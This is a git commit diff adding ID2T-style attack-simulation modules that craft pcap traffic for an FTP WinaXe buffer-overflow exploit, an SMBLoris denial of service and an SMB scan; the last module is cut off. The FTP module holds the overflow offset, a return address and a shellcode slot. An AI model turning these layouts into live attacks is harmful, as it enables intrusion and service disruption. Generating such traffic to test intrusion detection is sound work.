Jelajahi Sumber

rest of other group's files

Christof Jugel 6 tahun lalu
induk
melakukan
3006d2e3b8

+ 259 - 0
code/Attack/FTPWinaXeExploit.py

@@ -0,0 +1,259 @@
+import logging
+
+from random import randint
+from lea import Lea
+from scapy.layers.inet import IP, Ether, TCP
+
+from Attack import BaseAttack
+from Attack.AttackParameters import Parameter as Param
+from Attack.AttackParameters import ParameterTypes
+from ID2TLib.Utility import update_timestamp, generate_source_port_from_platform, get_rnd_x86_nop, forbidden_chars,\
+    get_rnd_bytes, get_bytes_from_file
+
+logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
+# noinspection PyPep8
+
+ftp_port = 21
+
+
+class FTPWinaXeExploit(BaseAttack.BaseAttack):
+
+    def __init__(self):
+        """
+        Creates a new instance of the FTPWinaXeExploit.
+
+        """
+        # Initialize attack
+        super(FTPWinaXeExploit, self).__init__("FTPWinaXe Exploit", "Injects an WinaXe 7.7 FTP Exploit.",
+                                               "Privilege elevation")
+
+        # Define allowed parameters and their type
+        self.supported_params = {
+            Param.IP_SOURCE: ParameterTypes.TYPE_IP_ADDRESS,
+            Param.IP_DESTINATION: ParameterTypes.TYPE_IP_ADDRESS,
+            Param.MAC_SOURCE: ParameterTypes.TYPE_MAC_ADDRESS,
+            Param.MAC_DESTINATION: ParameterTypes.TYPE_MAC_ADDRESS,
+            Param.INJECT_AT_TIMESTAMP: ParameterTypes.TYPE_FLOAT,
+            Param.INJECT_AFTER_PACKET: ParameterTypes.TYPE_PACKET_POSITION,
+            Param.IP_SOURCE_RANDOMIZE: ParameterTypes.TYPE_BOOLEAN,
+            Param.PACKETS_PER_SECOND: ParameterTypes.TYPE_FLOAT,
+            Param.CUSTOM_PAYLOAD: ParameterTypes.TYPE_STRING,
+            Param.CUSTOM_PAYLOAD_FILE: ParameterTypes.TYPE_STRING
+        }
+
+    def init_params(self):
+        """
+        Initialize the parameters of this attack using the user supplied command line parameters.
+        Use the provided statistics to calculate default parameters and to process user
+        supplied queries.
+
+        """
+        # PARAMETERS: initialize with default values
+        # (values are overwritten if user specifies them)
+        most_used_ip_address = self.statistics.get_most_used_ip_address()
+        if isinstance(most_used_ip_address, list):
+            most_used_ip_address = most_used_ip_address[0]
+
+        # The most used IP class in background traffic
+        most_used_ip_class = self.statistics.process_db_query("most_used(ipClass)")
+        attacker_ip = self.generate_random_ipv4_address(most_used_ip_class)
+        self.add_param_value(Param.IP_DESTINATION, attacker_ip)
+        self.add_param_value(Param.MAC_DESTINATION, self.generate_random_mac_address())
+
+        random_ip_address = self.statistics.get_random_ip_address()
+        # victim should be valid and not equal to attacker
+        while not self.is_valid_ip_address(random_ip_address) or random_ip_address == attacker_ip:
+            random_ip_address = self.statistics.get_random_ip_address()
+
+        self.add_param_value(Param.IP_SOURCE, random_ip_address)
+        victim_mac = self.statistics.get_mac_address(random_ip_address)
+        if isinstance(victim_mac, list) and len(victim_mac) == 0:
+            victim_mac = self.generate_random_mac_address()
+        self.add_param_value(Param.MAC_SOURCE, victim_mac)
+        self.add_param_value(Param.PACKETS_PER_SECOND,
+                             (self.statistics.get_pps_sent(most_used_ip_address) +
+                              self.statistics.get_pps_received(most_used_ip_address)) / 2)
+        self.add_param_value(Param.INJECT_AFTER_PACKET, randint(0, self.statistics.get_packet_count()))
+        self.add_param_value(Param.IP_SOURCE_RANDOMIZE, 'False')
+        self.add_param_value(Param.CUSTOM_PAYLOAD, '')
+        self.add_param_value(Param.CUSTOM_PAYLOAD_FILE, '')
+
+    def generate_attack_pcap(self):
+        def get_ip_data(ip_address: str):
+            """
+            :param ip_address: The ip of which (packet-)data shall be returned
+            :return: MSS, TTL and window size values of the given IP
+            """
+            # Set MSS (Maximum Segment Size) based on MSS distribution of IP address
+            mss_dist = self.statistics.get_mss_distribution(ip_address)
+            if len(mss_dist) > 0:
+                mss_prob_dict = Lea.fromValFreqsDict(mss_dist)
+                mss_value = mss_prob_dict.random()
+            else:
+                mss_value = self.statistics.process_db_query("most_used(mssValue)")
+
+            # Set TTL based on TTL distribution of IP address
+            ttl_dist = self.statistics.get_ttl_distribution(ip_address)
+            if len(ttl_dist) > 0:
+                ttl_prob_dict = Lea.fromValFreqsDict(ttl_dist)
+                ttl_value = ttl_prob_dict.random()
+            else:
+                ttl_value = self.statistics.process_db_query("most_used(ttlValue)")
+
+            # Set Window Size based on Window Size distribution of IP address
+            win_dist = self.statistics.get_win_distribution(ip_address)
+            if len(win_dist) > 0:
+                win_prob_dict = Lea.fromValFreqsDict(win_dist)
+                win_value = win_prob_dict.random()
+            else:
+                win_value = self.statistics.process_db_query("most_used(winSize)")
+
+            return mss_value, ttl_value, win_value
+
+        def check_payload_len(payload_len: int, limit: int):
+            """
+            Checks if the len of the payload exceeds a given limit
+            :param payload_len: The length of the payload
+            :param limit: The limit of the length of the payload which is allowed
+            """
+
+            if payload_len > limit:
+                print("\nCustom payload too long: ", payload_len, " bytes. Should be a maximum of ", limit, " bytes.")
+                exit(1)
+
+
+        pps = self.get_param_value(Param.PACKETS_PER_SECOND)
+
+        # Timestamp
+        timestamp_next_pkt = self.get_param_value(Param.INJECT_AT_TIMESTAMP)
+        # store start time of attack
+        self.attack_start_utime = timestamp_next_pkt
+
+        # Initialize parameters
+        ip_victim = self.get_param_value(Param.IP_SOURCE)
+        ip_attacker = self.get_param_value(Param.IP_DESTINATION)
+        mac_victim = self.get_param_value(Param.MAC_SOURCE)
+        mac_attacker = self.get_param_value(Param.MAC_DESTINATION)
+
+        custom_payload = self.get_param_value(Param.CUSTOM_PAYLOAD)
+        custom_payload_len = len(custom_payload)
+        custom_payload_limit = 1000
+        check_payload_len(custom_payload_len, custom_payload_limit)
+
+        packets = []
+
+        # Create random victim if specified
+        if self.get_param_value(Param.IP_SOURCE_RANDOMIZE):
+            # The most used IP class in background traffic
+            most_used_ip_class = self.statistics.process_db_query("most_used(ipClass)")
+            ip_victim = self.generate_random_ipv4_address(most_used_ip_class, 1)
+            mac_victim = self.generate_random_mac_address()
+
+        # Get MSS, TTL and Window size value for victim/attacker IP
+        victim_mss_value, victim_ttl_value, victim_win_value = get_ip_data(ip_victim)
+        attacker_mss_value, attacker_ttl_value, attacker_win_value = get_ip_data(ip_attacker)
+
+        minDelay, maxDelay = self.get_reply_delay(ip_attacker)
+
+        attacker_seq = randint(1000, 50000)
+        victim_seq = randint(1000, 50000)
+
+        sport = generate_source_port_from_platform("win7")
+
+        # connection request from victim (client)
+        victim_ether = Ether(src=mac_victim, dst=mac_attacker)
+        victim_ip = IP(src=ip_victim, dst=ip_attacker, ttl=victim_ttl_value, flags='DF')
+        request_tcp = TCP(sport=sport, dport=ftp_port, window=victim_win_value, flags='S',
+                          seq=victim_seq, options=[('MSS', victim_mss_value)])
+        victim_seq += 1
+        syn = (victim_ether / victim_ip / request_tcp)
+        syn.time = timestamp_next_pkt
+        timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps, minDelay)
+        packets.append(syn)
+
+        # response from attacker (server)
+        attacker_ether = Ether(src=mac_attacker, dst=mac_victim)
+        attacker_ip = IP(src=ip_attacker, dst=ip_victim, ttl=attacker_ttl_value, flags='DF')
+        reply_tcp = TCP(sport=ftp_port, dport=sport, seq=attacker_seq, ack=victim_seq, flags='SA',
+                        window=attacker_win_value, options=[('MSS', attacker_mss_value)])
+        attacker_seq += 1
+        synack = (attacker_ether / attacker_ip / reply_tcp)
+        synack.time = timestamp_next_pkt
+        timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps, minDelay)
+        packets.append(synack)
+
+        # acknowledgement from victim (client)
+        ack_tcp = TCP(sport=sport, dport=ftp_port, seq=victim_seq, ack=attacker_seq, flags='A',
+                      window=victim_win_value, options=[('MSS', victim_mss_value)])
+        ack = (victim_ether / victim_ip / ack_tcp)
+        ack.time = timestamp_next_pkt
+        timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps)
+        packets.append(ack)
+
+        # FTP exploit packet
+        ftp_tcp = TCP(sport=ftp_port, dport=sport, seq=attacker_seq, ack=victim_seq, flags='PA',
+                        window=attacker_win_value, options=[('MSS', attacker_mss_value)])
+
+        characters = b'220'
+        characters += get_rnd_bytes(2065, forbidden_chars)
+        characters += b'\x96\x72\x01\x68'
+        characters += get_rnd_x86_nop(10, False, forbidden_chars)
+
+        custom_payload_file = self.get_param_value(Param.CUSTOM_PAYLOAD_FILE)
+
+        if custom_payload == '':
+            if custom_payload_file == '':
+                payload = get_rnd_bytes(custom_payload_limit, forbidden_chars)
+            else:
+                payload = get_bytes_from_file(custom_payload_file)
+                check_payload_len(len(payload), custom_payload_limit)
+                payload += get_rnd_x86_nop(custom_payload_limit - len(payload), False, forbidden_chars)
+        else:
+            encoded_payload = custom_payload.encode()
+            payload = get_rnd_x86_nop(custom_payload_limit - custom_payload_len, False, forbidden_chars)
+            payload += encoded_payload
+
+        characters += payload
+        characters += get_rnd_x86_nop(20, False, forbidden_chars)
+        characters += b'\r\n'
+
+        ftp_tcp.add_payload(characters)
+
+        ftp_buff = (attacker_ether / attacker_ip / ftp_tcp)
+        ftp_buff.time = timestamp_next_pkt
+        timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps)
+        packets.append(ftp_buff)
+        attacker_seq += len(ftp_tcp.payload)
+
+        # Fin Ack from attacker
+        fin_ack_tcp = TCP(sport=ftp_port, dport=sport, seq=attacker_seq, ack=victim_seq, flags='FA',
+                        window=attacker_win_value, options=[('MSS', attacker_mss_value)])
+
+        fin_ack = (attacker_ether / attacker_ip / fin_ack_tcp)
+        fin_ack.time = timestamp_next_pkt
+        timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps, minDelay)
+        packets.append(fin_ack)
+
+        # Ack from victim on FTP packet
+        ftp_ack_tcp = TCP(sport=sport, dport=ftp_port, seq=victim_seq, ack=attacker_seq, flags='A',
+                      window=victim_win_value, options=[('MSS', victim_mss_value)])
+        ftp_ack = (victim_ether / victim_ip / ftp_ack_tcp)
+        ftp_ack.time = timestamp_next_pkt
+        timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps)
+        packets.append(ftp_ack)
+
+        # Ack from victim on Fin/Ack of attacker
+        fin_ack_ack_tcp = TCP(sport=sport, dport=ftp_port, seq=victim_seq, ack=attacker_seq+1, flags='A',
+                      window=victim_win_value, options=[('MSS', victim_mss_value)])
+        fin_ack_ack = (victim_ether / victim_ip / fin_ack_ack_tcp)
+        fin_ack_ack.time = timestamp_next_pkt
+        packets.append(fin_ack_ack)
+
+        # store end time of attack
+        self.attack_end_utime = packets[-1].time
+
+        # write attack packets to pcap
+        pcap_path = self.write_attack_pcap(sorted(packets, key=lambda pkt: pkt.time))
+
+        # return packets sorted by packet time_sec_start
+        return len(packets), pcap_path

+ 244 - 0
code/Attack/SMBLorisAttack.py

@@ -0,0 +1,244 @@
+import logging
+
+from random import randint, uniform
+from lea import Lea
+from scapy.layers.inet import IP, Ether, TCP
+from scapy.layers.netbios import NBTSession
+
+from Attack import BaseAttack
+from Attack.AttackParameters import Parameter as Param
+from Attack.AttackParameters import ParameterTypes
+from ID2TLib.Utility import update_timestamp
+from ID2TLib.SMBLib import smb_port
+
+logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
+# noinspection PyPep8
+
+
+class SMBLorisAttack(BaseAttack.BaseAttack):
+
+    def __init__(self):
+        """
+        Creates a new instance of the SMBLorisAttack.
+
+        """
+        # Initialize attack
+        super(SMBLorisAttack, self).__init__("SMBLoris Attack", "Injects an SMBLoris (D)DoS Attack",
+                                             "Resource Exhaustion")
+
+        # Define allowed parameters and their type
+        self.supported_params = {
+            Param.IP_SOURCE: ParameterTypes.TYPE_IP_ADDRESS,
+            Param.IP_DESTINATION: ParameterTypes.TYPE_IP_ADDRESS,
+            Param.MAC_SOURCE: ParameterTypes.TYPE_MAC_ADDRESS,
+            Param.MAC_DESTINATION: ParameterTypes.TYPE_MAC_ADDRESS,
+            Param.INJECT_AT_TIMESTAMP: ParameterTypes.TYPE_FLOAT,
+            Param.INJECT_AFTER_PACKET: ParameterTypes.TYPE_PACKET_POSITION,
+            Param.PACKETS_PER_SECOND: ParameterTypes.TYPE_FLOAT,
+            Param.ATTACK_DURATION: ParameterTypes.TYPE_INTEGER_POSITIVE,
+            Param.NUMBER_ATTACKERS: ParameterTypes.TYPE_INTEGER_POSITIVE
+        }
+
+    def init_params(self):
+        """
+        Initialize the parameters of this attack using the user supplied command line parameters.
+        Use the provided statistics to calculate default parameters and to process user
+        supplied queries.
+
+        :param statistics: Reference to a statistics object.
+        """
+        # PARAMETERS: initialize with default values
+        # (values are overwritten if user specifies them)
+        most_used_ip_address = self.statistics.get_most_used_ip_address()
+        if isinstance(most_used_ip_address, list):
+            most_used_ip_address = most_used_ip_address[0]
+
+        # The most used IP class in background traffic
+        most_used_ip_class = self.statistics.process_db_query("most_used(ipClass)")
+        num_attackers = randint(1, 16)
+        source_ip = self.generate_random_ipv4_address(most_used_ip_class, num_attackers)
+
+        self.add_param_value(Param.IP_SOURCE, source_ip)
+        self.add_param_value(Param.MAC_SOURCE, self.generate_random_mac_address(num_attackers))
+
+        random_ip_address = self.statistics.get_random_ip_address()
+        # ip-dst should be valid and not equal to ip.src
+        while not self.is_valid_ip_address(random_ip_address) or random_ip_address == source_ip:
+            random_ip_address = self.statistics.get_random_ip_address()
+
+        self.add_param_value(Param.IP_DESTINATION, random_ip_address)
+        destination_mac = self.statistics.get_mac_address(random_ip_address)
+        if isinstance(destination_mac, list) and len(destination_mac) == 0:
+            destination_mac = self.generate_random_mac_address()
+        self.add_param_value(Param.MAC_DESTINATION, destination_mac)
+        self.add_param_value(Param.PACKETS_PER_SECOND,
+                             (self.statistics.get_pps_sent(most_used_ip_address) +
+                              self.statistics.get_pps_received(most_used_ip_address)) / 2)
+        self.add_param_value(Param.INJECT_AFTER_PACKET, randint(0, self.statistics.get_packet_count()))
+        self.add_param_value(Param.ATTACK_DURATION, 30)
+
+    def generate_attack_pcap(self):
+        def get_ip_data(ip_address: str):
+            """
+            :param ip_address: the ip of which (packet-)data shall be returned
+            :return: MSS, TTL and Window Size values of the given IP
+            """
+            # Set MSS (Maximum Segment Size) based on MSS distribution of IP address
+            mss_dist = self.statistics.get_mss_distribution(ip_address)
+            if len(mss_dist) > 0:
+                mss_prob_dict = Lea.fromValFreqsDict(mss_dist)
+                mss_value = mss_prob_dict.random()
+            else:
+                mss_value = self.statistics.process_db_query("most_used(mssValue)")
+
+            # Set TTL based on TTL distribution of IP address
+            ttl_dist = self.statistics.get_ttl_distribution(ip_address)
+            if len(ttl_dist) > 0:
+                ttl_prob_dict = Lea.fromValFreqsDict(ttl_dist)
+                ttl_value = ttl_prob_dict.random()
+            else:
+                ttl_value = self.statistics.process_db_query("most_used(ttlValue)")
+
+            # Set Window Size based on Window Size distribution of IP address
+            win_dist = self.statistics.get_win_distribution(ip_address)
+            if len(win_dist) > 0:
+                win_prob_dict = Lea.fromValFreqsDict(win_dist)
+                win_value = win_prob_dict.random()
+            else:
+                win_value = self.statistics.process_db_query("most_used(winSize)")
+
+            return mss_value, ttl_value, win_value
+
+        pps = self.get_param_value(Param.PACKETS_PER_SECOND)
+
+        # Timestamp
+        first_timestamp = self.get_param_value(Param.INJECT_AT_TIMESTAMP)
+        # store start time of attack
+        self.attack_start_utime = first_timestamp
+
+        # Initialize parameters
+        packets = []
+        ip_destination = self.get_param_value(Param.IP_DESTINATION)
+        mac_destination = self.get_param_value(Param.MAC_DESTINATION)
+
+        # Determine source IP and MAC address
+        num_attackers = self.get_param_value(Param.NUMBER_ATTACKERS)
+        if (num_attackers is not None) and (num_attackers is not 0):  # user supplied Param.NUMBER_ATTACKERS
+            # The most used IP class in background traffic
+            most_used_ip_class = self.statistics.process_db_query("most_used(ipClass)")
+            # Create random attackers based on user input Param.NUMBER_ATTACKERS
+            ip_source = self.generate_random_ipv4_address(most_used_ip_class, num_attackers)
+            mac_source = self.generate_random_mac_address(num_attackers)
+        else:  # user did not supply Param.NUMBER_ATTACKS
+            # use default values for IP_SOURCE/MAC_SOURCE or overwritten values
+            # if user supplied any values for those params
+            ip_source = self.get_param_value(Param.IP_SOURCE)
+            mac_source = self.get_param_value(Param.MAC_SOURCE)
+
+        ip_source_list = []
+        mac_source_list = []
+
+        if isinstance(ip_source, list):
+            ip_source_list = ip_source
+        else:
+            ip_source_list.append(ip_source)
+
+        if isinstance(mac_source, list):
+            mac_source_list = mac_source
+        else:
+            mac_source_list.append(mac_source)
+
+        if (num_attackers is None) or (num_attackers is 0):
+            num_attackers = min(len(ip_source_list), len(mac_source_list))
+
+        # Check ip.src == ip.dst
+        self.ip_src_dst_equal_check(ip_source_list, ip_destination)
+
+        # Get MSS, TTL and Window size value for destination IP
+        destination_mss_value, destination_ttl_value, destination_win_value = get_ip_data(ip_destination)
+
+        minDelay,maxDelay = self.get_reply_delay(ip_destination)
+
+        attack_duration = self.get_param_value(Param.ATTACK_DURATION)
+        attack_ends_time = first_timestamp + attack_duration
+
+        victim_pps = pps*num_attackers
+
+        for attacker in range(num_attackers):
+            # Get MSS, TTL and Window size value for source IP(attacker)
+            source_mss_value, source_ttl_value, source_win_value = get_ip_data(ip_source_list[attacker])
+
+            attacker_seq = randint(1000, 50000)
+            victim_seq = randint(1000, 50000)
+
+            sport = 1025
+
+            # Timestamps of first packets shouldn't be exactly the same to look more realistic
+            timestamp_next_pkt = uniform(first_timestamp, update_timestamp(first_timestamp, pps))
+
+            while timestamp_next_pkt <= attack_ends_time:
+                # Establish TCP connection
+                if sport > 65535:
+                    sport = 1025
+
+                # prepare reusable Ethernet- and IP-headers
+                attacker_ether = Ether(src=mac_source_list[attacker], dst=mac_destination)
+                attacker_ip = IP(src=ip_source_list[attacker], dst=ip_destination, ttl=source_ttl_value, flags='DF')
+                victim_ether = Ether(src=mac_destination, dst=mac_source_list[attacker])
+                victim_ip = IP(src=ip_destination, dst=ip_source_list[attacker], ttl=destination_ttl_value, flags='DF')
+
+                # connection request from attacker (client)
+                syn_tcp = TCP(sport=sport, dport=smb_port, window=source_win_value, flags='S',
+                              seq=attacker_seq, options=[('MSS', source_mss_value)])
+                attacker_seq += 1
+                syn = (attacker_ether / attacker_ip / syn_tcp)
+                syn.time = timestamp_next_pkt
+                timestamp_next_pkt = update_timestamp(timestamp_next_pkt, victim_pps, minDelay)
+                packets.append(syn)
+
+                # response from victim (server)
+                synack_tcp = TCP(sport=smb_port, dport=sport, seq=victim_seq, ack=attacker_seq, flags='SA',
+                                 window=destination_win_value, options=[('MSS', destination_mss_value)])
+                victim_seq += 1
+                synack = (victim_ether / victim_ip / synack_tcp)
+                synack.time = timestamp_next_pkt
+                timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps, minDelay)
+                packets.append(synack)
+
+                # acknowledgement from attacker (client)
+                ack_tcp = TCP(sport=sport, dport=smb_port, seq=attacker_seq, ack=victim_seq, flags='A',
+                              window=source_win_value, options=[('MSS', source_mss_value)])
+                ack = (attacker_ether / attacker_ip / ack_tcp)
+                ack.time = timestamp_next_pkt
+                timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps)
+                packets.append(ack)
+
+                # send NBT session header paket with maximum LENGTH-field
+                req_tcp = TCP(sport=sport, dport=smb_port, seq=attacker_seq, ack=victim_seq, flags='AP',
+                              window=source_win_value, options=[('MSS', source_mss_value)])
+                req_payload = NBTSession(TYPE=0x00, LENGTH=0x1FFFF)
+
+                attacker_seq += len(req_payload)
+                req = (attacker_ether / attacker_ip / req_tcp / req_payload)
+                req.time = timestamp_next_pkt
+                timestamp_next_pkt = update_timestamp(timestamp_next_pkt, victim_pps, minDelay)
+                packets.append(req)
+
+                # final ack from victim (server)
+                last_ack_tcp = TCP(sport=smb_port, dport=sport, seq=victim_seq, ack=attacker_seq, flags='A',
+                                   window=destination_win_value, options=[('MSS', destination_mss_value)])
+                last_ack = (victim_ether / victim_ip / last_ack_tcp)
+                last_ack.time = timestamp_next_pkt
+                timestamp_next_pkt = update_timestamp(timestamp_next_pkt, pps, minDelay)
+                packets.append(last_ack)
+
+                sport += 1
+
+        # store end time of attack
+        self.attack_end_utime = packets[-1].time
+
+        # write attack packets to pcap
+        pcap_path = self.write_attack_pcap(sorted(packets, key=lambda pkt: pkt.time))
+
+        # return packets sorted by packet time_sec_start
+        return len(packets), pcap_path

+ 410 - 0
code/Attack/SMBScanAttack.py

@@ -0,0 +1,410 @@
+import logging
+
+from random import shuffle, randint
+from lea import Lea
+from scapy.layers.inet import IP, Ether, TCP
+from scapy.layers.smb import *
+from scapy.layers.netbios import *
+
+from Attack import BaseAttack
+from Attack.AttackParameters import Parameter as Param
+from Attack.AttackParameters import ParameterTypes
+from ID2TLib.SMB2 import *
+from ID2TLib.Utility import update_timestamp, get_interval_pps, get_rnd_os, get_ip_range,\
+    generate_source_port_from_platform, get_filetime_format
+from ID2TLib.SMBLib import smb_port, smb_versions, smb_dialects, get_smb_version, get_smb_platform_data,\
+    invalid_smb_version
+
+logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
+# noinspection PyPep8
+
+
+class SMBScanAttack(BaseAttack.BaseAttack):
+
+    def __init__(self):
+        """
+        Creates a new instance of the SMBScanAttack.
+
+        """
+        # Initialize attack
+        super(SMBScanAttack, self).__init__("SmbScan Attack", "Injects an SMB scan",
+                                             "Scanning/Probing")
+
+        # Define allowed parameters and their type
+        self.supported_params = {
+            Param.IP_SOURCE: ParameterTypes.TYPE_IP_ADDRESS,
+            Param.IP_DESTINATION: ParameterTypes.TYPE_IP_ADDRESS,
+            Param.PORT_SOURCE: ParameterTypes.TYPE_PORT,
+            Param.MAC_SOURCE: ParameterTypes.TYPE_MAC_ADDRESS,
+            Param.MAC_DESTINATION: ParameterTypes.TYPE_MAC_ADDRESS,
+            Param.INJECT_AT_TIMESTAMP: ParameterTypes.TYPE_FLOAT,
+            Param.INJECT_AFTER_PACKET: ParameterTypes.TYPE_PACKET_POSITION,
+            Param.IP_SOURCE_RANDOMIZE: ParameterTypes.TYPE_BOOLEAN,
+            Param.PACKETS_PER_SECOND: ParameterTypes.TYPE_FLOAT,
+            Param.PORT_SOURCE_RANDOMIZE: ParameterTypes.TYPE_BOOLEAN,
+            Param.HOSTING_IP: ParameterTypes.TYPE_IP_ADDRESS,
+            Param.HOSTING_VERSION: ParameterTypes.TYPE_STRING,
+            Param.SOURCE_PLATFORM: ParameterTypes.TYPE_STRING,
+            Param.PROTOCOL_VERSION: ParameterTypes.TYPE_STRING,
+            Param.IP_DESTINATION_END: ParameterTypes.TYPE_IP_ADDRESS
+        }
+
+    def init_params(self):
+        """
+        Initialize the parameters of this attack using the user supplied command line parameters.
+        Use the provided statistics to calculate default parameters and to process user
+        supplied queries.
+
+        :param statistics: Reference to a statistics object.
+        """
+        # PARAMETERS: initialize with default values
+        # (values are overwritten if user specifies them)
+        most_used_ip_address = self.statistics.get_most_used_ip_address()
+        if isinstance(most_used_ip_address, list):
+            most_used_ip_address = most_used_ip_address[0]
+
+        self.add_param_value(Param.IP_SOURCE, most_used_ip_address)
+        self.add_param_value(Param.IP_SOURCE_RANDOMIZE, 'False')
+        self.add_param_value(Param.MAC_SOURCE, self.statistics.get_mac_address(most_used_ip_address))
+
+        all_ips = self.statistics.get_ip_addresses()
+        if not isinstance(all_ips, list):
+            ip_destinations = []
+            ip_destinations.append(all_ips)
+        else:
+            ip_destinations = all_ips
+        self.add_param_value(Param.IP_DESTINATION, ip_destinations)
+        destination_mac = []
+        for ip in ip_destinations:
+            destination_mac.append(self.statistics.get_mac_address(str(ip)))
+        if isinstance(destination_mac, list) and len(destination_mac) == 0:
+            destination_mac = self.generate_random_mac_address()
+        self.add_param_value(Param.MAC_DESTINATION, destination_mac)
+        self.add_param_value(Param.PORT_SOURCE, randint(1024, 65535))
+        self.add_param_value(Param.PORT_SOURCE_RANDOMIZE, 'True')
+        self.add_param_value(Param.PACKETS_PER_SECOND,
+                             (self.statistics.get_pps_sent(most_used_ip_address) +
+                              self.statistics.get_pps_received(most_used_ip_address)) / 2)
+        self.add_param_value(Param.INJECT_AFTER_PACKET, randint(0, self.statistics.get_packet_count()))
+
+        rnd_ip_count = self.statistics.get_ip_address_count()/2
+        self.add_param_value(Param.HOSTING_IP, self.statistics.get_random_ip_address(rnd_ip_count))
+        self.host_os = get_rnd_os()
+        self.add_param_value(Param.HOSTING_VERSION, get_smb_version(platform=self.host_os))
+        self.add_param_value(Param.SOURCE_PLATFORM, get_rnd_os())
+        self.add_param_value(Param.PROTOCOL_VERSION, "1")
+        self.add_param_value(Param.IP_DESTINATION_END, "0.0.0.0")
+
+    def generate_attack_pcap(self):
+        def get_ip_data(ip_address: str):
+            """
+            Gets the MSS, TTL and Windows Size values of a given IP
+
+            :param ip_address: the ip of which (packet-)data shall be returned
+            :return: MSS, TTL and Window Size values of the given IP
+            """
+            # Set MSS (Maximum Segment Size) based on MSS distribution of IP address
+            mss_dist = self.statistics.get_mss_distribution(ip_address)
+            if len(mss_dist) > 0:
+                mss_prob_dict = Lea.fromValFreqsDict(mss_dist)
+                mss_value = mss_prob_dict.random()
+            else:
+                mss_value = self.statistics.process_db_query("most_used(mssValue)")
+
+            # Set TTL based on TTL distribution of IP address
+            ttl_dist = self.statistics.get_ttl_distribution(ip_address)
+            if len(ttl_dist) > 0:
+                ttl_prob_dict = Lea.fromValFreqsDict(ttl_dist)
+                ttl_value = ttl_prob_dict.random()
+            else:
+                ttl_value = self.statistics.process_db_query("most_used(ttlValue)")
+
+            # Set Window Size based on Window Size distribution of IP address
+            win_dist = self.statistics.get_win_distribution(ip_address)
+            if len(win_dist) > 0:
+                win_prob_dict = Lea.fromValFreqsDict(win_dist)
+                win_value = win_prob_dict.random()
+            else:
+                win_value = self.statistics.process_db_query("most_used(winSize)")
+
+            return mss_value, ttl_value, win_value
+
+        pps = self.get_param_value(Param.PACKETS_PER_SECOND)
+
+        # Calculate complement packet rates of the background traffic for each interval
+        complement_interval_pps = self.statistics.calculate_complement_packet_rates(pps)
+
+
+        # Timestamp
+        timestamp_next_pkt = self.get_param_value(Param.INJECT_AT_TIMESTAMP)
+        # store start time of attack
+        self.attack_start_utime = timestamp_next_pkt
+        timestamp_prv_reply, timestamp_confirm = 0,0
+
+        # Initialize parameters
+        ip_source = self.get_param_value(Param.IP_SOURCE)
+        ip_destinations = self.get_param_value(Param.IP_DESTINATION)
+        hosting_ip = self.get_param_value(Param.HOSTING_IP)
+        ip_range_end = self.get_param_value(Param.IP_DESTINATION_END)
+        mac_source = self.get_param_value(Param.MAC_SOURCE)
+        mac_dest = self.get_param_value(Param.MAC_DESTINATION)
+
+        # Check smb version
+        smb_version = self.get_param_value(Param.PROTOCOL_VERSION)
+        if smb_version not in smb_versions:
+            invalid_smb_version(smb_version)
+        hosting_version = self.get_param_value(Param.HOSTING_VERSION)
+        if hosting_version not in smb_versions:
+            invalid_smb_version(hosting_version)
+        # Check source platform
+        src_platform = self.get_param_value(Param.SOURCE_PLATFORM).lower()
+        packets = []
+
+        # randomize source ports according to platform, if specified
+        if self.get_param_value(Param.PORT_SOURCE_RANDOMIZE):
+            sport = generate_source_port_from_platform(src_platform)
+        else:
+            sport = self.get_param_value(Param.PORT_SOURCE)
+
+        # No destination IP was specified, but a destination MAC was specified, generate IP that fits MAC
+        if isinstance(ip_destinations, list) and isinstance(mac_dest, str):
+            ip_destinations = self.statistics.get_ip_address_from_mac(mac_dest)
+            if len(ip_destinations) == 0:
+                ip_destinations = self.generate_random_ipv4_address("Unknown", 1)
+            # Check ip.src == ip.dst
+            self.ip_src_dst_equal_check(ip_source, ip_destinations)
+
+        ip_dests = []
+        if isinstance(ip_destinations, list):
+            ip_dests = ip_destinations
+        else:
+            ip_dests.append(ip_destinations)
+
+        # Generate IPs of destination IP range, if specified
+        if ip_range_end != "0.0.0.0":
+            ip_dests = get_ip_range(ip_dests[0], ip_range_end)
+            shuffle(ip_dests)
+
+        # Randomize source IP, if specified
+        if self.get_param_value(Param.IP_SOURCE_RANDOMIZE):
+            ip_source = self.generate_random_ipv4_address("Unknown", 1)
+            while ip_source in ip_dests:
+                ip_source = self.generate_random_ipv4_address("Unknown", 1)
+            mac_source = self.statistics.get_mac_address(str(ip_source))
+            if len(mac_source) == 0:
+                mac_source = self.generate_random_mac_address()
+
+        # Get MSS, TTL and Window size value for source IP
+        source_mss_value, source_ttl_value, source_win_value = get_ip_data(ip_source)
+
+        for ip in ip_dests:
+
+            if ip != ip_source:
+
+                # Get destination Mac Address
+                mac_destination = self.statistics.get_mac_address(str(ip))
+                if len(mac_destination) == 0:
+                    if isinstance(mac_dest, str):
+                        if len(self.statistics.get_ip_address_from_mac(mac_dest)) != 0:
+                            ip = self.statistics.get_ip_address_from_mac(mac_dest)
+                            self.ip_src_dst_equal_check(ip_source, ip)
+
+                        mac_destination = mac_dest
+
+                    else:
+                        mac_destination = self.generate_random_mac_address()
+
+                # Get MSS, TTL and Window size value for destination IP
+                destination_mss_value, destination_ttl_value, destination_win_value = get_ip_data(ip)
+
+                minDelay, maxDelay = self.get_reply_delay(ip)
+
+                # New connection, new random TCP sequence numbers
+                attacker_seq = randint(1000, 50000)
+                victim_seq = randint(1000, 50000)
+
+                # Randomize source port for each connection if specified
+                if self.get_param_value(Param.PORT_SOURCE_RANDOMIZE):
+                    sport = generate_source_port_from_platform(src_platform, sport)
+
+                # 1) Build request package
+                request_ether = Ether(src=mac_source, dst=mac_destination)
+                request_ip = IP(src=ip_source, dst=ip, ttl=source_ttl_value, flags='DF')
+                request_tcp = TCP(sport=sport, dport=smb_port, window=source_win_value, flags='S',
+                                  seq=attacker_seq, options=[('MSS', source_mss_value)])
+                attacker_seq += 1
+                request = (request_ether / request_ip / request_tcp)
